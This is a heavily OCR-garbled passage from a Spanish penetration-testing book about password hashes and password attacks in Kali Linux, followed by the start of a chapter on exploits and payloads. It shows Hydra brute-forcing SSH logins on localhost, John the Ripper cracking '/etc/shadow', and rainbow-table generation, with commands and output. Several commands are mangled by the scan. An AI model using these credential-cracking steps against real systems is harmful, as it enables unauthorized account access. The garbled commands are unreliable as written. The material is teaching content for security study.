es  una  situation  donde  dos  enrradas  distintas  a  uria  funcion  de  hash  producen  una  misma  salida. 
Esto  se  debe  a  que  ef  numero  potencial  de  posibles  entradas  es  mayor  que  el  numero  de  salidas 
que  puede  producir  un  hash.  1 

El  hecho  de  que  en  estas  funciones  de  resumen  se  puedan  introducir  datos  de  longitud  arbitral!  a  y 
a  partir  de  ellos  se  genere  un  hash  de  tamaho  fijo,  es  lo  que  permile  que  siempre  exista  el  riesgo 
de  colisiones,  dcbido  a  que  un  hash  dado  puede  pertenecer  a  un  infinite  numero  de  entradas.  Por 
esta  razon  es  posible  que  dos  palabras  distintas  generen  un  misrno  MD5, 

La  probabilidad  de  colision  se  vera  afectada  por  la  efectividad  del  algoritmo  de  reduction,  es  deeii . 
las  colisiones  se  producen  mas  frecuentemente  en  algoritmos  mal  disefiados,  I  I ay  variaeiones  del 
MD5  que  implementan  en  su  algoritmo  de  resumen  la  incorporation  de  una  variable  denominada 
salt,  que  no  es  mas  que  un  conjunto  de  bits  uleatnrios,  con  el  fin  de  reducir  las  posibi I idades  de 
colisiones  e  incluso  aumentando  la  fortaleza  del  hash  hactendolo  mas  diJieil  de  descitrar.  1 

'  SNA :  Estos  hashes  son  tambien  usados  en  muchos  CMS,  foros  y  versiones  actuates  dc 
sistemas  UNIX  y  GNU/Linwc,  Es  un  si  sterna  de  funciones  hash  de  la  Agenda  dc  Seguridad 
Nacional  de  los  Estados  Unidos.  Nacio  como  SHA  cerca  del  ano  1993,  pero  en  la  aclualidad  es 
una  lam  ilia  amplia,  donde  se  eneuentran  d  SHA- 1  y  el  SHA- 2,  siendo  este  ultimo  el  que  agrupa 
.S HA-224,  S HA-256,  SHA-3S4,  y  SHA-512.  El  SHA- 1  es  representado  como  un  conjunto  de  32 
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digitos  hexadecimal,  mientras  que  los  demas  son  rcpresentados  como  un  conjunto  de  56,  64,  % 
y  128  digitos  hexadecimales  respectivamente,  haciendo  csto  cada  vez  mas  dificil  las  eolisiones. 

*  LM:  Es  cl  primer  hash  de  los  sistemas  Windows  utdizado  para  representar  las  contrasefias  en 
un  fichero  y  fue  iniroducido  en  versiones  previas  a  Windows  NT.  Este  algoritmo  de  cifrado  hoy 
en  dia  esta  considerado  obsolete  y  no  seguro,  solamente  es  utiiizado  portemas  decompatibihdad 
eon  sistemas  operatives  antiguos.  La  debilidad  de  este  hash  se  centra  en  3  caracteristicas,  que 

son: 

El  maxima  tamano  de  las  contrasefias  es  de  14  caracteres,  y  para  hacer  d  proeeso  de  hash, 
este  sc  divide  en  dos  bloques  de  7  caracteres  cada  uno. 

-  No  existe  diferencia  alguna  entre  mayusculas  y  minusculas  ya  que  en  d  proeeso  de 
cifrado  la  contrasena  es  transformada  completamente  a  mayusculas. 

La  simplicidad  del  algoritmo  pennite  generar  con  un  equipo  sin  muehas  prestaciones  mas 
de  1 0  miilones  de  hash  por  segundo. 

*  NTLM:  Es  el  sucesor  de  LM,  proportions  mayor  robustez  y  seguridad  que  el  hash  LM.  El 
proeeso  de  ataque  a  este  tipo  de  hash  conlleva  un  aumento  exponential  de  riempo.  sobre  todo 
si  sc  utilizan  mas  de  8  caracteres,  mezclando  mayusculas,  minusculas,  niimeros  y  caracteres 
especiales. 

Metodos  de  ataque 

Dentro  de  las  lecnicas  de  ataques  a  contrasefias  se  encucntran: 

-  Ataques  de  fiierza  bmta:  esta  tecnica  consiste  en  probar  lodas  las  combinaciones  posibles 
hasta  encontrar  aquclla  que  pennite  el  acceso,  usando  distinlos  patrones  (numeros,  caracteres, 
mayusculas  y  minusculas,  entre  otros)  y  siendo  el  unico  limilante  el  largo  establecido  de  la 
contrasefla, 

Ataques  de  diecionario:  son  muy  simi lares  a  los  “ataques  de  fuerza  bruta  l  La  diferencia 
radica  en  que  las  combinaciones  suelen  ser  palabras  de  un  diccionario,  detenu inados  por  un 
ienguaje  y  dialecto  en  particular  Suelen  ser  mas  rapidos  que  los  “ataques  de  fuerza  bruta" 
por  contener  menos  combinaciones  con  que  eomparar,  y  con  pocas  probabilidades  de  exito 
con  sistemas  que  emplean  contrasefias  fuertes  con  caracteres  alfanumericos,  mayusculas, 
minusculas  y  cualquier  otro  tipo  de  simbolo. 

-  Ataques  de  Rainbow  Table :  son  ataques  basados  en  una  tabla  que  almacena  una  relation  de 
pares  de  palabras  en  texto  piano  (palabra  initial  -  palabra  final).  La  relation  que  vincula  estas 
palabras  es  que  am  has  son  utilizadas  en  la  funcion  de  resumen  y  reduction  que  representa 
la  Rainbow  Table.  El  proeeso  que  $e  realiza  para  la  creation  de  una  de  estas  tablas  es  el 
siguiente:  Sobre  la  palabra  initial  se  aplica  un  algoritmo  de  resumen  y  se  obtiene  el  hash  de 
dicha  palabra.  Luego  dicho  hash  se  le  aplica  un  algoritmo  dc  reduce  i6n,  que  genera  como 
resultado  una.  nueva  palabra  en  texto  piano.  Cabe  destacar  que  el  algoritmo  de  reduction  no 
esta  revertiendo  el  hash ,  la  palabra  obtenida  no  tiene  que  ver  con  el  hash  anterior,  mientras 
que  con  el  algoritmo  de  resumen  que  se  aplica  a  la  palabra  initial  si  que  da  como  resultado 
ti  hash  de  dicha  palabra, 


Image ii  G3.06:  Proceso  de  crcacidn  dc  una  Rainbow  Table. 


Este  proceso  dc  resumen  y  reduccion.  suele  repetirse  alrededor  dc  unas  40.000  voces  par3 
cada  linea  que  sc  almacena  durante  el  proceso  de  creation  de  una  Rainbow  Table,  La  ultima 
palabra  obtenida  despues  dc  realizar  todo  el  proceso  es  la  palabra  final  que  sc  almacena 
junto  con  la  palabra  inicial  que  inicio  d  proceso.  Para  descifrar  un  hash  con  Rainbow  Table 
sc  realiza  el  mismo  proceso  las  susodichas  40000  veces,  comparando  en  cada  una  de  ellas, 
cl  resultado  del  algoritmo  dc  reduccion  con  la  palabra  final  almacenada  en  cada  linea,  Si 
no  se  consigue  coincidencia  alguna  despues  de  repetir  el  proceso  significa  que  ese  hash 
no  esta  contemplado  por  esa  Rainbow  Table .  En  caso  contrario.  si  se  encontrara  alguna 
coincidencia  en  dicho  proceso,  se  toma  la  linea,  y  se  realiza  de  nuevo  la  reduccion  v  el 
resumen  mencionados.  tomando  esta  vez  como  punto  de  partida  la  palabra  inicial  de  la  linea, 
hasta  asi  encontrar  la  palabra  que  genera  el  hash  que  se  esta  buscando. 


Tipos  de  ataque 


En  Kali  Linux  existen  nuichas  herramientas  de 
modulus  dentro  de  los  cuales  eshin: 


ataques  a  contrasenas.  Estan  subdivididas  en  3 


A  tuques  con  concxion 

En  este  tipo  de  ataque  es  necesario  que  el  dispositivo  o  servicio  se  encuentre  en  linea.  para  de  esta 
tomia  poder  establecer  una  comunieacion  con  el  mismo,  en  la  que  se  intenlan  averiguar  credenciales 
validas  estudiando  el  tipo  de  respuestas  obtenidas  por  cada  una  de  las  pelieiones  que  se  ie  realizan. 
Todas  las  herramientas  de  este  tipo  de  ataque  se  pueden  encontrar  en  la  pestafia  de  Aplicaciones- 
>Kali  Lbmx-> Ataques  de  eontrasehas->A toques  con  conexion,  1 

Una  herramienta  muy  conocida  y  utilizada  es  Findmyhash.  Es  un  scrips  desarrollado  en  Python  que 
permite  buscar  hashes  de  contrasenas  en  diferentes  servicios  web  gratuitos  para  tratar  de  romperlos. 
Este  proceso  consiste  en  consultar  distintos  repositories  en  Internet  que  alniacenan  hashes  ya 
estudiados,  para  buscar  coincidencias  coil  la  biisqueda  que  se  realiza.  Suele  ser  una  manera  mas 
tacil  y  elcctiva  de  estudiar  un  hash,  aumentando  la  probabilidad  de  conseguir  un  resultado  por 
su  diversidad  en  la  biisqueda,  y  que  suele  ser  una  vetitaja  IVente  a  las  herramientas  de  ataque  a 
eontraseflas  sin  conexibn.  Tambien  puede  I  legar  a  ser  mas  rapida,  ya  que  en  la  mayoria  de  casos  solo 
se  basa  en  la  comparaeion  de  lo  que  se  busca,  y  un  hash  ya  estudiado  y  aimacenado  en  repositorios 
online  no  requiere  de  ningun  cSIculo  o  proceso  de  cbmputo.  Esta  herramienta  estudia  hashes  MD4, 
MD5,  SHA I ,  SHA224,  SHA256,  SHA384.  SHA512,  RMDI60,  GOST,  WHIRLPOOL.  LM,  NTLM, 
MySQL,  C1SC07,  JUNIPER,  LDAP  MD5,  LDAP  SHA  1 ,  1 

Se  puede  usar  esta  herramienta  accediendo  directamente  en  la  terminal  usando  el  comando 
Tindmyhash  o  a  traves  dc  la  pestana  de " ' Aplicaciones ' .  De  cualquiera  de  los  2  modos  se  obtendnt 
en  la  terminal  toda  la  intormaeibn  de  la  herramienta.  El  comando  se  estructura  de  la  si guiente  manera: 
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Cisco  enable,  CVS .  Firebird ,  FTP,  HTTP  LIMP  MS-SQL,  MySQL,  Oracle *  RDP,  SMB,  SA/rp 
SNMP,  SSH ,  Svnt  Telnet.  VMware-Auth,  VNC ,  etcetera, 

La  herramienta  viene  eti  dos  versiones,  una  para  ser  utilizada  desde  la  terminal  y  otra  que  e:s 
interfaz  visual  donde  se  rellenan  los  daios  necesarios  para  realizar  el  ataque*  Elementos  importantet 
a  tener  en  cuenta  cuando  se  realiza  un  ataque  con  esta  herramienta  son: 

-  Dates  del  objetivo  como  direct:  ion  o  lista  de  direcciones  que  se  qureren  analizar,  el  puerto 
y  el  protocolo  a  atacar. 

-  Datos  de  usuarios  y  contrasenas  que  se  quieren  probar,  lo  mas  comtin  es  elaborar  un 

diccionario  en  un  document©  de  texto  y  especificar  las  credenciales  a  probar  Se  puede  haeer 
un  solo  diccionario  y  utilizarse  tanto  para  usuarios  como  para  contrasenas,  j 


fmugen  03.09:  Diccionario  en  documento  de  texto* 

Un  eseenario  para  demostrar  la  configuraeidn  y  el  funcionamient©  de  la  herramienta  puede  ser  cl 
siguiente:  Se  tiene  un  objetivo  (en  el  easo  de  esta  prueba  sera  el  propio  localhost).  en  cl  cual  se  tiene 
la  certeza  de  que  se  esta  ejeculando  un  servicio  de  SSI  I  y  se  desean  ob tener  las  credenciales  para 
poder  conectarse  a  el.  Af  abrirse  la  herramienta  Hydra-gtk  se  observa  la  siguiente  interfaz,  J 


Etna  gen  03,1  U:  Interlk/  visual  de  Hydra , 
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gn  |a  prime ra  pestana  se  eonfigura  lodo  lo  relaeionado  eon  el  objetivo  a  ataear.  En  la  imagert  anterior 
es  posible  apreciar  que  se  ha  colocado  la  direed  on  a  atacar,  el  protocolo  y  la  puerta  de  enlace. 

Tambien  se  observa  que  debajo  hay  otras  opciones  a  marear,  como  por  ejemplo  si  se  desea  usar 
551  k  visualizar  todos  los  intentos*  mostrar  una  explication  detallada  de  lodo  el  proceso  de  ataque 
(errores  y  adertos),  o  si  se  desea  ver cada  una  de  las  acciones  que  realiee  la  herramienta.  En  el  caso 
de  que  no  se  seleccionen  ninguna  de  diehas  opciones,  solo  mostrara  los  rcsultados  positives  en  caso 
de  scr  eneontrados,  en  caso  contrario  se  visual  izara  un  mensaje  de  que  no  pudo  ser  hallada  ninguna 

coincidence. 

£n  [a  segunda  pcstaha  aparece  lodo  lo  relaeionado  con  las  credeneiales.  En  dicha  pestana  se 
especifican  los  usuarios  y  las  contrasenas  que  se  desean  probar  en  cada  uno  de  los  apartados.  La 
inclusion  de  dichos  usuarios  y  contrasenas  puede  hacerse  de  manera  manual  en  la  primera  opcion 
de  cada  apartado,  o  especificando  un  documento  de  texlo  que  contenga  un  diccionario  de  palabras 
con  tas  que  se  realizam  la  prueba.  Ademas  debajo  se  encuentran  dos  opciones  importantes  a  tener 
eri  cuenia,  que  consisten  en  poder  probar  el  mismo  nombre  de  usuario  como  conlrasena  y  el  probar 
una  contrasena  vada. 


[magen  03,11:  Credeneiales  en  Hydra. 

r\a  vez  e spec ifi cada  esta  informaeidn,  es  cuando  llega  el  momenta  de  lanzar  cl  ataque  desde  la 
lnia  pestana.  Desde  donde  se  presiona  start,  la  herramienta  ejecuta  el  ataque  y  muestra  el  resultado 

de!  estudio. 
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S*tir 


x  Hydra 


Tarqvt  Pasiward*  Tuning  Specific  Stan 
Output 

Hydra  v7  9  (c)201  2  by  van  Hiuter/THC  &  David  Maciejak  -  for  legal  pur  pot 

Hydra  (http  /fwww.  the  of g/ the  hydra]  starting  at  2013-04-16  11  43:40 
[DATA]  16  talks.  1  i*rverr  399  login  tries  (l:  19/p:  21).  -24  tries  per  t«k 
[DATA]  attacking  service  ish  on  port  22 

[2 2]tcsh]  host:  127+0  01  login:  javi  password:  test 

[2 2 ]{ssh]  host:  127.0.0.1  login:  manuel  password:  test  12 34 

[22]{ssh]  host:  12  7,0,0  1  login:  pepe  password:  2Z3test, 

[22][ssh]  host:  12  7.0.0.1  login:  root  password:  123*bc, 

[STATUS]  attack  finished  for  127  0  0  1  (waiting  for  children  to  finish) 

1  of  1  target  successful?  completed,  4  valid  passwords  found 

Hydra  (hfrtp://w ww  thc.org/thc-Tiydra)  finished  at  2013-04  -16  11:44:34 

<finished> 


hydra  -s  22  -L  /foat/Desktop/dKCionario  -P /root/Desktop/diccionaria  -e. 


tmigCB  03, 12:  Rcsultado  del  esludio  con  Hydra. 


Otra  herramienta  may  mili/ada  para  ILataques  de  diccionantT  es  Medusa.  Es  gealionabic  solo  a 
(raves  de  la  terminal  y  lo  fundamental  para  su  manejo  (al  igual  que  con  Hydra),  es  eonoeer  los  dates 
del  objetivo  (direction,  protoeolo  y  puerto)  y  los  dates  de  las  credeneiales  (diccionario  con  lodes  las 
cotnbinaciones  a  utilizar). 


Ataques  sin  conexion 

En  este  tipo  de  ataques.  re sulta  necesario  establecer  contacto  con  el  dispositive  o  servicio, 
( general mente  ima  unica  ocasion),  en  la  que  se  establece  una  comum cac ion  cifrada  o  se  consigue 
un  hash  que  puede  ser  almacenado  de  manera  local  para  posteriormente  ser  estudiado*  En  este  tipo 
de  ataques,  todo  el  proceso  es  realizado  de  manera  local.  Una  vez  que  se  obtiene  el  hash  a  estudiar 
pueden  utilizarse  una  gran  cantidad  de  herramientas  que  ofrece  Kali  Lima,  concretamente  para 
este  tipo  de  ataques  se  pueden  encontrar  las  herramientas  en  la  pestaha  Aplicaciones->Xa//  Limtx- 
> Ataques  de  contrasenas->Ataques  sin  conexiom 


Una  herrarnienta  muy  util  a  la  hora  de  idemificar  un  hash  sin  sober  que  tipo  de  hash  se  posee  es 
hash-identifier.  Solo  se  le  debe  especificar  el  hash  obtenido,  la  herramienta  lo  estudia  y  muestra  el 
tipo  de  hash  que  podria  ser.  Para  demostrar  el  funcionamiento  de  esta  herramienta  se  Ionia  un  hash 
SHA512.  Si  esta  se  ejeeuta  desde  la  pcstafta  de  aplicaciones  se  abrira  una  terminal,  solicilando  el 
hash  que  se  desea  estudiar.  Como  se  puede  observar  en  la  sigiuente  imagen  una  vez  especificado 
die  ho  hash,  la  herramienta  se  enearga  de  identiliear  y  sugerir  los  posibles  tipos  de  hash  que  pueden 
ser.  dividiendolos  en  2  tipos:  Tipos  de  hash  probables  y  tipos  de  hash  menos  probables. 
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Imagen  03.13:  hush- identifier. 


£Sta  puede  ser  una  herrarnienta  util  si  no  se  tiene  la  certeza  de  que  tipo  de  hash  se  obtuvo,  para  asi 
haeerse  una  idea  de  que  estudio  se  debe  realizar  y  que  herramienta  utilizar  en  base  a]  iipo  de  hash 

obtenido. 

i  na  vez  identificado  el  hash  se  puede  utilizar  una  aplicacidn muy  popular  en  el  mundo  de  ataques  a 
contrasenas  como  es  Johntheripper.  Esta  herramienta  utiliza  tamo  “ataques  de  1’uerza  bruta”  como  de 
dictionaries  Se  le  puede  especificar  un  diccionario  de  palabras  eon  contrasenas  tipieas  que  se  puede n 
eonseguir  en  Internet.  Tambien  prueba  con  variaciones  de  eslas  palabras  afiadiendo  numeros,  signos, 
imiyuseuias  y  minuscu (as,  intercambia  letras,  combina  palabras,  etcetera.  Ademas  de  que  ot'rece  el 
iipico  sistema  de  t'uerza  bruta  en  el  que  se  prueba  n  todas  las  combi  nac  ion  es  posibles,  scan  palabras 
o  no. 


Se  puede  acceder  a  la  herramienta  ulilizando  el  comando  "john "  en  la  terminal,  o  a  traves  de  la 
pestana  de  aphcaciones  y  muestra  la  sintaxis  de  los  comandos  y  las  opciones.  Esta  aplieacion 
tambien  tiene  una  interfaz  visual  ilamada  “johnny'  a  la  que  se  puede  acceder  a  traves  de  la  pestana 
dc  aplicaciones.  Esta  herramienta  es  capaz  de  identificar  el  hash  que  se  introduce,  pero  tambien 
puede  forzarse  a  resolver  solo  un  tipo  de  hash  con  e!  comando:  “John  —source— {tipo  de  hash }  ' 


bo  mas  importante  es  tener  en  cuenta  el  modo  en  que  se  quiere  ejecutar  Johntheripper  y  el  fichero 
que  contiene  los  hashes  a  estudiar.  En  esta  ocasion  se  estudiara  el  fichero  ^ /etc/shadow'  que 
uimacena  las  contrasenas  de  los  usuarios  en  cualquier  sistema  GNU  Lima.  Para  ello  hay  que  tener 
cn  cuenta  que  Johntheripper  tiene  4  modos  de  ataques  a  contrasenas.  A  continuacion  se  muestran 
dichos  modos  con  su  comando  de  consulta  correspond  iente 


-  "Single  crack":  Este  modo  prueba  contrascftas  simi lares  a]  usuario.  El  comando  para  este 
dpo  dc  consulta  seria  el  siguiente:  "John  —single  (fichero  a  estudiar}  " 


hlYO 


ruotQkaU: 

Term-naJ  Ayud.i 


Fdlt*f  Ver  Bum.*) 

r  ouiyk.u  i ;  -#  j  ohrv  -single  /Qtc/shodc** 

Loaded  A  password  hashes  with  A  different  salts  (generic  crypt (31  [7/32)1 
)  svil23  (javi) 

gu*sm;  1  time:  6:08:04 :15  10»  c/s:  40.56  trying:  Hi999&919l6  -  999691960 
tha  "  -  -show"  option  to  display  all  nf,  the  cratk^d  passwords  reliably 


j 


Imagen  03.  ]  4:  Johntheripper  modo  single  crack, 
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'hwordlistM:  Este  mode  utiliza  ataque  por  diccionarios.  por  defecto  irae  un  diccionario 
muy  bAsico  pero  puede  especificarse  un  diccionario  que  pueda  descargarse  o  crearse.  El 
comando  es:  "John  -wonllist- {fichero  con  el  diccionario}  (fichero  a  estudlar ( " 


hnagen  03.  \5  :  Johntherippet  modo  wordiisf. 


-  Modo  “IncremeutaH:  Esie  modo  emplea  ataque  por  fuerza  bruta,  probando  con  todas  las 
posibilidades  existentes,  El  comando  es:  'John  -incremental  {fichero  a  estudiarj  ” 

-  Modo  “External":  En  esle  modo  se  puede  definir  un  codigo  propio  para  generar  las 
eontrasefias  de  prueba,  Pueden  establecerse  las  reglas  para  crear  las  eruradas  a  comparer  y 
puede n  establecerse  incluso  filtros  para  contra  I ar  las  entradas  generadas. 


Jntroduciendo  en  la  terminal  el  comando  “John  {ruta  del  fichero  que  contiene  las  hashes}"  se 
aplican  los  3  primeros  modos  uno  detras  del  oiro.  primero  usu  el  modo  "single  truck"*  luego  el 
modo  "incrementaC  y  nor  ultimo  cl  modo  "wordiisC.  Si  el  fichero  es  de  configuration  y  almacena 
una  relacion  usuario -fttissword,  (eomo  es  este  caso).  genera  una  salida  del  mismo  tipo  (usuario- 
password },  Si  es  mi  fichero  que  contiene  solo  hashes,  la  salida  es  solo  el  texto  piano  que  genera  esc 
hash. 


Olra  aplicacion  util  es  rtgen,  que  perinite  generar  tablas  de  rainbow  con  el  fin  de  mejorar  el 
rendimiento  en  un  proceso  de  crackeo.  La  aplicacion  devolvera  uno  o  varios  fidieros  de  tipo  ri  que 
almaeenaran  en  su  interior  la  tabla  de  los  hashes  precalculados. 

La  aplicacion  rainbowcrack  se  encuentra  cn  la  ruta  fusrfshare/ra i n b owcrack.  En  esta  ruta  se 
encuentran  archives  corno  charset Jxt  el  cual  define  los  diferentes  charsets  que  se  pueden  utilizar  y 
la  tibreria  alglibO.so  con  la  que  se  definen  los  algoritmos  para  el  soporte  de  los  hashes. 


Los  parA  metros  que  se  disponen  en  rtgen  son  los  siguientes: 


1 - 

ParA  metro 

Description 

Hash  algorithm 

Algoritmos  disponibles  en  rtgen  (MD5t  SffAf  MM  NTLMf  etcetera).  J 

Charset 

Conjunto  de  caraeteres  que  se  utilizaran  para  realizar  las  eombinaciones  en 
la  tabla. 

1  Plaintext  Jen  min 

Longitud  minima  de  las  palabras  quo  seran  hasheadas. 

PI ait i text  lert  max 

Longitud  maxima  de  las  palabras  que  seran  hasheadas. 

Table  index 

Indice  de  la  funcion  de  reduction  que  se  utiliza  en  las  tablas  de  rainbow. 

Cap 'i mb  SI.  Ana  Us  is  de  vn/nerabi/idades  v  ataques  de  con  1 1  as  en  as 


HU 


para  metro 

Description 

Chain,  ten 

Longitud  de  las  eadenas  dentro  de  la  tabla  de  rainbow *  E  3  mfnimo  es  16 
bytes 

Chain  mm 

Numero  de  eadenas  en  fa  tabla,  Importante  un  numero  alto  para  cubrir  con 
mas  probabilidad  el  charset 

Partindex 

Punto  de  entrada  para  cada  proceso  de  crackeo  y  puede  ser  aleatoric 

La  aplicacidn  rtsort  permite  que  e!  pracesamienlo  de  la  tab  la  y  la  busqueda  en  esta  sea  n  mas  sencillos, 
Es  por  esto  que  se  debe  utilizar  la  aplicacion  una  vez  generada  la  tabla  con  el  fin  de  optimizar  los 
procesos  que  se  realicen  eon  la  tabla  de  rainbow. 


roatgfcali:/usf /share /rainbowc rack#  rtgen  lm  numeric  350  360  1Q60G0  0 
rainbow  table  Imnum© ric #3 -5_0  360x10000 G_G. rt  parameters 
lash  algorithm: 

■^ash  length: 
rharset : 
charset  in  hex: 
charset  length: 

3 1 ain text  length  range ; 
reduce  offset: 
plaintext  total; 


lm 

e 

0123456789 

30  31  32  33  34  35  36  37  38  39 
10 

3  -  5 

0x06060006 

111006 


Sequential  starting  point  begin  from  3  ( &x0GGG0630GG80®000) 
gene  rat img . * . 

32768  of  160006  rainbow  chains  generated  (6  m  4.9  b) 

55536  of  100006  rainbow  chains  generated  (0  m  5.1  sj 

98304  of  160000  rainbow  chains  generated  10  m  5.0  s) 

10G000  of  L6G000  rainbow  chains  generated  {0  tti  3,3  s] 

reotgkali J /os  r /sha  re /rainbowc rack  #  rt  so  rt  l m  nume  ric#3 - 5_0_ 

l m_nu me ric#3 - 5  JJ_  is  not  a  rainbow  table 

rootgkali:/usr  /share  ft  ainbcw*  rack#  rtsort  Im  nyine  ric#3 -5  0 

L  m  jiuine  nc#3 -5_0_1 0Q60X 1 000006 .  rt  1  m_nume  ric#3  - 5_G_3G6x  100300  0  .  rt 

Llti_nume  ric#3  -S_0_10G0xl00003_G .  rt 

root^kali:  /usr/share/rairibowcrack#  rtsort  Imjiuma  ric#3-5_3_36Gxl00G3G_0  .  rt 
Lmjiurne  ric#3-5J5_30GxlGG000_G.  rt : 

315624960  bytes  memory  available 
Loading  rainbow  table  .  .  . 
sorting  rainbow  table  by  end  point . . . 
writing  sorted  rainbow  table.** 


Imaged  03. 1 6:  Generation  de  um  labia  de  rainbow  para  el  algoritmo  LM  con  5  digit  os  de  Jongitod. 


a  hei  rami  cnia  mack  permite  utilizar  las  tab  las  de  rainbow  generadas  anteriormente,  o  iucluso 
eseargadas  de  Internet,  por  ejemplo  desde  http://proj ec t-rainbowcrack, com/table. h tm ,  con  el  fin  de 
°Pbmizar  d  proceso  de  crackeo,  La  herramienta  dispone  de  una  sene  de  parametros  que  se  indican 

3  continuation: 


Description 


Se  le  indica  el  hash  a  crackear. 


Se  le  indica  un  fichero  de  hashes  ohtenido  de  un  volcado  hashdump. 


Se  le  indica  un  fichero  con  un  listado  de  los  hashes  en  concrete.  No  es  similar  a  la 
option  / 
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La  s  intax  is  de  ejecucion  de  rcraek  es  la  siguiente  rcrack  ruta  del  archive  RT  generado  >  [.f} 
<hash>  \-f<votcado  de  hashes  enfichem>\-l  <  list  ado  de  hashes^]*  fl 

De  igual  manera  Kali  Linux  tiene  otra  herramienta  may  potente  llamada  ophcrack,  esta  iambi  en 
utiliza  Rainbow  Tables  y  esl6  dispomble  tamo  en  interfaz  visual  coma  en  terminal  y  su  manejo  es 
muy  similar 

El  problema  de  estos  ataques  es  el  tiempo  que  coni  leva  descifrar  una  contrasena,  debido  a  la  enorme 
cantidad  de  posibles  combi naci ones  para  esta,  la  cantidad  de  algoritmos  de  resumen  que  existen  y  la 
cantidad  de  posibles  resultados  que  eslos  algoritmos  pueden  generar.  A  medida  que  avanzan  los  afios 
estos  algoritmos  ban  evolucionado  y  se  hacen  cada  vez  mas  comp  I  ej  os  y  fuertes*  j 

Aqui  se  puede  observar  la  gran  diferencia  entire  conseguir  descifrar  un  hash  LM ,  (que  por  su 
simplicidad  puede  tardar  solo  unas  boras),  debido  a  que  se  consiguen  generar  mas  de  10  millones 
de  hashes  por  segundo  en  una  maquina  sin  muchas  prestaciones.  En  cambio  en  hashes  mas  robustos 
como  WPA7WPA2  se  podnan  conseguir  unicamente  unos  1000  o  2000  hashes  por  segundo 
aproximadamente.  1 

La  diferencia  es  abrumadora,  sin  embargo,  hay  una  herramienta  muy  popular  en  este  mundo  que 
la  mayor! a  de  ios  usuarios  tiene  en  sus  ordenadorcs  y  desconocen  de  su  valor  a  la  liora  de  atacar 
contraseftas,  como  es  la  GPU  de  las  tarjetas  graficas*  Hoy  en  dfa  las  GPU  son  muy  potente s,  pueden 
Hegar  a  tener  una  frecuencia  de  rcloj  de  entre  unos  600  MHz  y  1  GHz,  manor  a  la  de  una  CPU 
convencional  que  ronda  entre  los  2,0  Ghz  y  4  GHz,  Sin  embargo,  la  GPU  esta  basada  en  el  modelo 
circulante,  que  facilita  el  procesamiento  en  paralelo  y  posee  una  gran  segmentation  para  las  tare  as 
a  diferencia  del  modelo  de  Von  Neumann  que  utilizan  los  CPU,  Por  tanto,  agiliza  mucho  e!  proceso 
de  realizar  “ataques  de  fuerza  brute*'  en  las  GPU.  :■ 

Kali  Linux  posee  dos  apiieaciones  muy  polentes  que  emplean  el  uso  de  la  GPL  para  “ataques  de 
fuerza  bruta”  a  contraseflas  como  lo  son  oclhashcai-plm  y  Pyrit ,  ambas  ejecutables  a  traves  de  la 
terminal. 
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(  apit  ulo  IV.  Explotacion 


1.  Introduction  a  los  exploits 

El  mundo  de  los  exploits  es  complejo  y  amplio.  Un  exploit  no  es  mas  que  una  pequena  aplicacion 
eserita  con  cl  objetivo  de  apravecharse  de  una  vulnerabilidad  conocida  en  un  software.  La 
itlnerabilidad  o  hug  es  el  resultado  de  un  folio  de  programacidn  durante  su  creacidn  o  implantation. 
Lsu-  fallo  de  programacidn  es  algo  Idgico,  ya  quc  las  aplicacioncs  son  creadas  por  seres  humanos, 
]os  cuales  fidlan  en  su  dia  a  dia*  Por  !o  general  este  liecho  ocurre  en  la  etapa  do  implemeniacion, 
fiem  el  fallo  puede  haberse  mtroducido  en  cualquiera  de  las  etapas  del  tide  de  vida  de  un $0 ware. 

La  palabra  exploit  viene  del  verbo  to  exploit 9  el  cual  significa  aprovcchar  o  explotar.  Como  se  ha 
men  ci  on  ado  anteriormente  un  exploit  cs  un  codigo  escrito  con  el  objetivo  de  aprovecharse  de  un 
I  a  Ho  en  ta  implementation  de  un  aplieativo  y  la  intention  de  obtener  ciertos  privitegios  tras  la 
explotacion,  Por  ejemplo,  se  podria  causar  la  caida  de  la  aplicacion.  la  modification  de  datos  que 
inaneja  esta,  el  control  de  la  maquina  donde  sc  esta  ejecutandn  el  aplieativo  u  obtener  information 
sensible  de  dicho  entomo. 


Los  exploits  tienen  su  origen  en  un  eonjunto  de  errorcs  de  programme  i  on  simi  lares,  por  ello,  quien 

conoce  bien  el  fimeionamiento  de  la  ingenieria  inversa  puede  delectar  estos  errores  “fficibnente” 

LI  objetivo  de  un  pentester  a  la  hora  de  uttiizar  un  exploit  es  conseguir  el  maximo  de  dicha  action, 

^  decar.  el  control  de  la  maquina  remota,  Esta  action  se  logra  cuando  se  consigue  ejecutar  codigo 

arbitrary  en  la  maquina  remota  a  traves  del  exploit.  Este  codigo  que  se  ejecuta  se  denomina  payload 
°  shellcode. 


i  ^ongLiajc  estrella  para  desarrollar  exploits  es  el  lenguajc  C  \  antique  se  pueden  realizar  en  otros 
Ruby,  Java ,  Python  ^  etcetera. 


vulnerabilidades  existen  por  una  mala  configuracidn  o  la  utilization  de  una  version  aniigua 
y:  so^wate.  Por  esta  raztVn,  se  recomienda  la  actual izacidn  del  software  y  disponer  de  fas  ultimas 
_iones  que  corrijan  dichos  fallos  de  programation.  La  utilization  de  software  pirata  no  ayuda  a 
m.  riesgos*  ya  que  al  no  disponer  de  soporte  no  se  podra  aciualizar  la  version  v  el  usuario 

H^dara  vulnerable. 
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Conceptos 

,-Quc  cs  un  payload l  F.s  la  parlc  del  c6digo  de  un  exploit  que  tiene  el  objetivo  de  ejecutarse  en  |a 
maquina  victima  para  realizar  una  acci6n,  general  mente,  maltciosa.  Un  pay  had  no  es  mas  que  una  | 
serif  de  instrucciones  quo  el  exploit  se  encarga  de  inyectar  y  haeer  que  se  ejecuten  por  la  maquina 
vulnerada.  Hstas  instrucciones  de  codigo  pueden  implementar  una  shell,  un  meterpreter,  la  adicidn 
de  un  usuario  al  sistema.  la  descarga  de  un  archivo  y  ejecucion  de  este,  etcetera,  Los  payloads 
iinplementan  diversas  acciones  aunquc  algunos  son  mucho  mas  conocidos  que  otros.  fl 

El  caso  mas  generico  para  todos  I  os  sistenias  operativos  vulnerados  es  la  consecucion  de  una  shell 
de  tipo  inverso.  En  este  caso  el  atacante  habra  conseguido  cjecutar  una  shell  en  la  maquina  remota  y 
Lomar  el  control  de  esta.  Ademas,  al  ser  de  tipo  inverso,  es  el  payload  que  se  ejecuia  en  la  maquina 
vulnerada  quien  se  conecta  al  atacante,  evitando  de  esta  forma  un  router .  J 

!  .as  instrucciones  del  payload  0  shellcode  son  escritas  en  lenguaje  ensamblador,  Se  pueden  visrualizar 
ejemplos  con  msjpayload,  herramienta  disponible  en  Kali ,  para  generar  variables  en  distintos 
